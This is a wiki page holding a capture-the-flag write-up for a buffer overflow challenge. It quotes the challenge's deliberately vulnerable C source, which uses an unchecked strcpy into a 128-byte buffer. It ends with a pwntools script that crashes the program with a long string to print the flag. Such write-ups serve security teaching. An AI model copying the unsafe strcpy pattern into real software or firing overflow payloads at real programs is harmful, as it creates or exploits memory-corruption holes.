-
Notifications
You must be signed in to change notification settings - Fork 1
Overflow 0
cheaterdxd edited this page Oct 9, 2019
·
3 revisions
This should be easy. Overflow the correct buffer in this program and get a flag. Its also found in /problems/overflow-0_1_54d12127b2833f7eab9758b43e88d3b7 on the shell server. Source.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#define FLAGSIZE_MAX 64
char flag[FLAGSIZE_MAX];
void sigsegv_handler(int sig) {
fprintf(stderr, "%s\n", flag);
fflush(stderr);
exit(1);
}
void vuln(char *input){
char buf[128];
strcpy(buf, input);
}
int main(int argc, char **argv){
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}
fgets(flag,FLAGSIZE_MAX,f);
signal(SIGSEGV, sigsegv_handler);
gid_t gid = getegid();
setresgid(gid, gid, gid);
if (argc > 1) {
vuln(argv[1]);
printf("You entered: %s", argv[1]);
}
else
printf("Please enter an argument next time\n");
return 0;
}
In vuln( ) , it copy the argv to buf which buf's length is 128.
In the sigsegv_handler function, if there is a sigsegv is handle, this function can be called and print the flag.
if we send a payload bigger than array, overflow the return address, then a sigsegv can appeare. And we can get flag.
from pwn import *
payload = 'a'*0x200
s = process(['./vuln_oveflow',payload])
s.interactive()